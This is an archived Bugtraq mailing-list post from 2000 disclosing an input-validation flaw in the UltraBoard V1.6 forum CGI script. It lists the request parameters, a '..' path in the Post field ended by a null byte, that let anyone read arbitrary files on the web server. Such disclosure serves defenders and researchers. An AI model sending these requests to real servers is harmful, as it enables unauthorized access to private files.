Bugtraq: Fun with UltraBoard V1.6X

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Fun with UltraBoard V1.6X

From: rudicarell () HOTMAIL COM (rudi carell)
Date: Wed, 3 May 2000 02:13:16 PDT


hola friends,

found some interesting things in the "old" UltraBoard-Forum scripts
(UltraBoard V 1.6)

class:Input Validation Error
remote:Yes
vulnerable:UltraBoard V1.*
vendor: www.ultrascripts.com || www.ub2k.com

Description:
By using the good old NullByte(\000) its possible to open "any" file on the
webserver(with its permissions) running the "UltraBoard" forum-software.

cgi-script:
UltraBoard.pl || UltraBoard.cgi

Variables:
Action=PrintableTopic
Post=[path_including_".."_to_any_file][***NULLBYTE***]
Board=[valid_board]
Idle=10
Sort=0
Order=Descend
Page=0
Session=

hmm ... EOF

nizedays,

rudic

rudicarell () hotmail com
<dream>"getrootallthetime"</dream>

________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com

By Date By Thread

Current thread:

glibc resolver weakness, (continued)
- glibc resolver weakness antirez (May 02)
  - Re: glibc resolver weakness Bennett Todd (May 03)
  - Re: glibc resolver weakness Valdis.Kletnieks () VT EDU (May 03)
  - Re: glibc resolver weakness Andrew Brown (May 03)
  - Cayman 3220-H DSL Router DOS cassius () HUSHMAIL COM (May 05)
- Fun with UltraBoard V1.6X rudi carell (May 03)
  - Fwd: tcpdump workaround against dnsloop exploit. THE INFAMOUS (May 03)
    - Re: tcpdump workaround against dnsloop exploit. David Schwartz (May 06)
    - NetBSD Security Advisory 2000-002 Daniel Carosone (May 06)
    - [NHC20000504a.0: NetBSD Panics when sent unaligned IP options] NHC Research (May 06)
    - Re: Fwd: tcpdump workaround against dnsloop exploit. Sebastian (May 07)